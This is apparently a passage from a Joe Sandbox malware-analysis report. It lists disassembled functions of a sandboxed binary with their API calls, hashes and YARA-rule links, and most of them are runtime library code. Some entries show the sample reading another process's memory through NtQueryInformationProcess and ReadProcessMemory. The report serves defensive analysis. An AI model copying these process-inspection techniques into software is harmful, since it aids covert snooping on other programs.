                                                                                                                                                                                                                              • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                              • API String ID: 1383202999-2891247106
                                                                                                                                                                                                                              • Opcode ID: 49456c79f7ab1edb08fc0943547c2c7cb97320bdb3923cd30c9a953f1e4e5d2e
                                                                                                                                                                                                                              • Instruction ID: 500a2bfa7bd270a02981edc884dbe7b4c5d55a3660e1982d5727589564e77b48
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49456c79f7ab1edb08fc0943547c2c7cb97320bdb3923cd30c9a953f1e4e5d2e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EB1AC7158010AAFEF2D9E68CD59EFF3BAAFF09300F144019FA46A62D1D6319A11DB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FBF7E Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005FBF85
                                                                                                                                                                                                                                • Part of subcall function 005E8610: std::_Lockit::_Lockit.LIBCPMT ref: 005E8657
                                                                                                                                                                                                                                • Part of subcall function 005E8610: std::_Lockit::_Lockit.LIBCPMT ref: 005E8679
                                                                                                                                                                                                                                • Part of subcall function 005E8610: std::_Lockit::~_Lockit.LIBCPMT ref: 005E86A1
                                                                                                                                                                                                                                • Part of subcall function 005E8610: std::_Lockit::~_Lockit.LIBCPMT ref: 005E880E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                              • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                              • API String ID: 1383202999-2891247106
                                                                                                                                                                                                                              • Opcode ID: 1fe61dd6d6e8153c78a4c608b1976c37c50f159e2337c7ba66400a7649a4ae7c
                                                                                                                                                                                                                              • Instruction ID: 66bfa726a576e6aad6752d46935871f8a52ce8655f44950e61369937ab1d45e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fe61dd6d6e8153c78a4c608b1976c37c50f159e2337c7ba66400a7649a4ae7c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8B1AF7690010EEFCF19DFA4CA59DFE3FA9FB49340F154929FB42A2291D6398A10DB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E3C20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 225libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 005E36D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 005E3735
                                                                                                                                                                                                                                • Part of subcall function 005E36D0: _wcschr.LIBVCRUNTIME ref: 005E37C6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 005E3CA8
                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 005E3D01
                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 005E3D7A
                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 005E3EB1
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 005E3F34
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 005E3F7B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
                                                                                                                                                                                                                              • String ID: NtQueryInformationProcess$1c
                                                                                                                                                                                                                              • API String ID: 566592816-2853955895
                                                                                                                                                                                                                              • Opcode ID: f3d91951e3660f06109ca51e0a7d8475e7ad77fc2610db522bb53607c80e91ab
                                                                                                                                                                                                                              • Instruction ID: e9cb071a01362b7ee96db529c23ce150e82cdf15df26684a7e7c6f134f07456a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3d91951e3660f06109ca51e0a7d8475e7ad77fc2610db522bb53607c80e91ab
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38A17BB0905659DEDB24CF65CC48BAEBBF4FF48304F20459DD449A7280E7B96A88CF91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00603F20 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00603F57
                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00603F5F
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00603FE8
                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00604013
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00604068
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                              • String ID: 2`$TG`$csm
                                                                                                                                                                                                                              • API String ID: 1170836740-382123075
                                                                                                                                                                                                                              • Opcode ID: 12e87b1504665d685d7ce401645572c182924b58cccc788bdeb8ea308cbde05a
                                                                                                                                                                                                                              • Instruction ID: 2381ff9a5c16052867e40ceb02a61d04c3fa1127fabfeaf2da2d39ce80715bce
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12e87b1504665d685d7ce401645572c182924b58cccc788bdeb8ea308cbde05a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD41D434E4021A9FCF18DF68C880A9FBBBAEF44325F148459F9146B3D2C7319A15CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F8555 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 005F855C
                                                                                                                                                                                                                              • _Maklocstr.LIBCPMT ref: 005F85C5
                                                                                                                                                                                                                              • _Maklocstr.LIBCPMT ref: 005F85D7
                                                                                                                                                                                                                              • _Maklocchr.LIBCPMT ref: 005F85EF
                                                                                                                                                                                                                              • _Maklocchr.LIBCPMT ref: 005F85FF
                                                                                                                                                                                                                              • _Getvals.LIBCPMT ref: 005F8621
                                                                                                                                                                                                                                • Part of subcall function 005F1CD4: _Maklocchr.LIBCPMT ref: 005F1D03
                                                                                                                                                                                                                                • Part of subcall function 005F1CD4: _Maklocchr.LIBCPMT ref: 005F1D19
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                                                                                                              • String ID: false$true
                                                                                                                                                                                                                              • API String ID: 3549167292-2658103896
                                                                                                                                                                                                                              • Opcode ID: de1499d5463dfcd2e70f94717eb620829e139651607a64a9f3b631795ae7cfde
                                                                                                                                                                                                                              • Instruction ID: 800f76e3a3a69fb8da04e846b921c0deb0dc90d80d5c1cd5a609b513bcf96199
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de1499d5463dfcd2e70f94717eb620829e139651607a64a9f3b631795ae7cfde
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11217172D00318EADF14EFA5D889AEE7FA8FF44710F00845ABA159F142DA749644CBA5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E9730 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::locale::_Init.LIBCPMT ref: 005E9763
                                                                                                                                                                                                                                • Part of subcall function 005F0C94: __EH_prolog3.LIBCMT ref: 005F0C9B
                                                                                                                                                                                                                                • Part of subcall function 005F0C94: std::_Lockit::_Lockit.LIBCPMT ref: 005F0CA6
                                                                                                                                                                                                                                • Part of subcall function 005F0C94: std::locale::_Setgloballocale.LIBCPMT ref: 005F0CC1
                                                                                                                                                                                                                                • Part of subcall function 005F0C94: std::_Lockit::~_Lockit.LIBCPMT ref: 005F0D17
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005E978A
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005E97F0
                                                                                                                                                                                                                              • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 005E984A
                                                                                                                                                                                                                                • Part of subcall function 005EF57A: __EH_prolog3.LIBCMT ref: 005EF581
                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,?,006354B1,00000000), ref: 005E99BF
                                                                                                                                                                                                                              • __cftoe.LIBCMT ref: 005E9B0B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockitstd::locale::_$H_prolog3Lockit::_$FreeInitLocalLocimp::_Locinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                                                              • API String ID: 3578231455-1405518554
                                                                                                                                                                                                                              • Opcode ID: 1825adc30f386b01b4f5d4f00e0247d44b563dbe270dcf18f4f6612fbe16f8b7
                                                                                                                                                                                                                              • Instruction ID: 918c53f40119f227aa6ecd30c3f6a055be8636e9271084e26de0325a9b008fc2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1825adc30f386b01b4f5d4f00e0247d44b563dbe270dcf18f4f6612fbe16f8b7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40F1AD71D04289DFDB18CFA9C884BAEBFB5FF09304F244169E845AB381E7359A04CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 006172FB Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00617632,00000021,FlsSetValue,0062BD58,0062BD60,?,?,00615955,00000006,000000FF,?,00606CE7,00000000,A8a), ref: 006173BC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID: A8a$api-ms-$ext-ms-
                                                                                                                                                                                                                              • API String ID: 3664257935-3837951151
                                                                                                                                                                                                                              • Opcode ID: 8b3d19f6e6e92beb87fb62b4f098cedf218196ba74f66137d215be1f685804e0
                                                                                                                                                                                                                              • Instruction ID: bf58a9239ccb514eabf02aaf4d7f25842d799e3a48201ed31e44726c335529f2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b3d19f6e6e92beb87fb62b4f098cedf218196ba74f66137d215be1f685804e0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44210531A09211ABCB229B64AC41EDA37BB9F51760F281210ED25E73D0D730EE41E6E0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E40B0 Relevance: 12.2, APIs: 8, Instructions: 233memorytimeCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,40000022,FAB1B776,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 005E4154
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,3FFFFFFF,FAB1B776,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 005E4177
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 005E4217
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,FAB1B776,?,?,?), ref: 005E42D2
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,FAB1B776,?,?,?), ref: 005E42F3
                                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,FAB1B776,?,?,?), ref: 005E4326
                                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,FAB1B776,?,?,?), ref: 005E4337
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,FAB1B776,?,?,?), ref: 005E4355
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,FAB1B776,?,?,?), ref: 005E4371
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1424318461-0
                                                                                                                                                                                                                              • Opcode ID: e69bdec8bd8a8420d8da21f624ac44dd6c08964b58b34aedadf6603b48ca9086
                                                                                                                                                                                                                              • Instruction ID: a7818bee7a0a564b0005d37511f7a18396deb5516b1c4805c68bceda395b8922
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e69bdec8bd8a8420d8da21f624ac44dd6c08964b58b34aedadf6603b48ca9086
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7581BDB1A006459FCB18CFA9D885BAEFBB5FB48310F244229E965A73C0D770A941CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0060266D Relevance: 12.2, APIs: 8, Instructions: 224COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,?), ref: 006026F8
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00602786
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 006027B0
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 006027F8
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00602812
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00602838
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00602875
                                                                                                                                                                                                                              • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00602892
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3603178046-0
                                                                                                                                                                                                                              • Opcode ID: 1e0098e1944b0d81224ba617ab9ded014fcdfb3cc95e71458d09236eae4b0750
                                                                                                                                                                                                                              • Instruction ID: 6e4ce2841ecf1090fa426d3b1d28e3f6ab8d18f4120261fde14c629fe4f54878
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e0098e1944b0d81224ba617ab9ded014fcdfb3cc95e71458d09236eae4b0750
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C71B37594020BABDF298FA4CC69AEF7BBBEF45750F284059E904A72D0D731C945CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0060215A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 006021A3
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 006021CF
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0060220E
                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0060222B
                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0060226A
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00602287
                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006022C9
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 006022EC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2040435927-0
                                                                                                                                                                                                                              • Opcode ID: 18c9e3d76fe6d531f8bb2740cee28e31b75999bcf6603203feb2bdbafdb31774
                                                                                                                                                                                                                              • Instruction ID: c4a6caabc85a8604a6783173916e09668b45d60cdcebe95db2aa56c1003a23d7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18c9e3d76fe6d531f8bb2740cee28e31b75999bcf6603203feb2bdbafdb31774
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6851A17258020BBBEF284FA4CC99FEB7BAAEF44740F154528FA15A62D0D7348D119B60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E8610 Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005E8657
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005E8679
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005E86A1
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000044,00000000,FAB1B776,?,00000000), ref: 005E86F9
                                                                                                                                                                                                                              • __Getctype.LIBCPMT ref: 005E877B
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005E87E4
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005E880E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2372200979-0
                                                                                                                                                                                                                              • Opcode ID: 25d83c93de751636cb1d1c905bc883eb01fa32d00d2677076fc2b776c496b37e
                                                                                                                                                                                                                              • Instruction ID: fa386bd9c2be74aa4159e055187ea7aa00bd1846e223a61c35b24f31b7392cdc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25d83c93de751636cb1d1c905bc883eb01fa32d00d2677076fc2b776c496b37e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E261CFB0C00698CFDB15CF68C944BAABBF5FF14314F148159D889AB292EB35AE41CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E9270 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005E92A0
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005E92C2
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005E92EA
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000018,00000000,FAB1B776,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 005E9342
                                                                                                                                                                                                                              • __Getctype.LIBCPMT ref: 005E93BD
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005E93F8
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005E9422
